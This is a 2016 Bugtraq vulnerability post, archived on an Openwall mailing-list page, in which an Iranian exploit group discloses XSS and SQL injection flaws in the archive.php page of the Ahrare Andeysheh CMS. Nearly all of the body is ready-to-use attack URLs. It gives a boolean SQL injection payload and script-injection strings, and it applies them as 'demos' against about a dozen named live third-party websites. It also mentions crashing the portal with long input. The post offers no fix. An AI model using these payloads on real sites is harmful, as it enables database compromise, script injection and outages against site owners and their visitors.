lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <201604161845.u3GIjV8n031945@sf01web3.securityfocus.com>
Date: Sat, 16 Apr 2016 18:45:31 GMT
From: iesb.team@...il.com
To: bugtraq@...urityfocus.com
Subject: Ahrare Andeysheh Cms Multiple Vulnerabilities

Xss and sqli and poc on ahrare andeysheh cms to all versions

#################################

#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#

#####################################

#####################################

# Iranian Exploit DataBase

# Ahrare Andeysheh Cms Multiple Vulnerabilities

# Vulnerability : Xss & Sql Injection & Poc

# Vulnerability on : archive.php

# Version : All Versions

# Pic Of Xss Vulnerability : http://up.iedb.ir/uploads/ahrar-bug1.jpg

# Pic Of Sql Vulnerability : http://up.iedb.ir/uploads/ahrar-bug2.jpg

# Vendor site : http://www.ahrareandeysheh.com/

# Author : IeDb.Ir

# Site : Www.IeDb.Ir - Www.IeDb.Ir/acc - xssed.Ir - kkli.ir

# Vulnerability attack information site : http://xssed.Ir/

# Archive Exploit = http://kkli.ir/aOFh6

#####################################

# Bug :
[Xss And Sql Injection] to from=1395/01/01

http://www.site.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01[Xss&Sql]&to=1395/01/26&sec_id=99999999

Poc :

http://www.site.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=[Poc]
http://www.site.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=99999999') oR 5967562=5967562--

# Dem0 [ Xss And Sqli]

http://enghelab-news.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://jameparsi.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.hezbollah-k.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://smquran.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://sabernews.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.tabatabaey.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://atabe.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.dorplast.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.nedanews.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.ahrareandeysheh.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.hezbollah-k.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999

Demo [Poc]

http://www.jameparsi.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=99999999') oR 5967562=5967562--

Insert Java Code Or very long input, and disrupt the system And This portal will be unavailable.


# Pic Of Xss Vulnerability : http://up.iedb.ir/uploads/ahrar-bug1.jpg

# Pic Of Sql Vulnerability : http://up.iedb.ir/uploads/ahrar-bug2.jpg

#####################################

Tnks To : All Member In Iedb.ir And Iedb.ir/acc

B3hz4d - C0dex - Mr.time - Bl4ck M4n - Mahdi-x - Khashayar - Iedb - AliTn - Sinizian Man - one alone hacker - Dr.Koders - b3hz4d4

Medrik - Security - Net.Hun73r - Tak.Fanar And All Member In Iedb Forum

#####################################

# Archive Exploit = http://iedb.ir/exploits-5061.html

#####################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ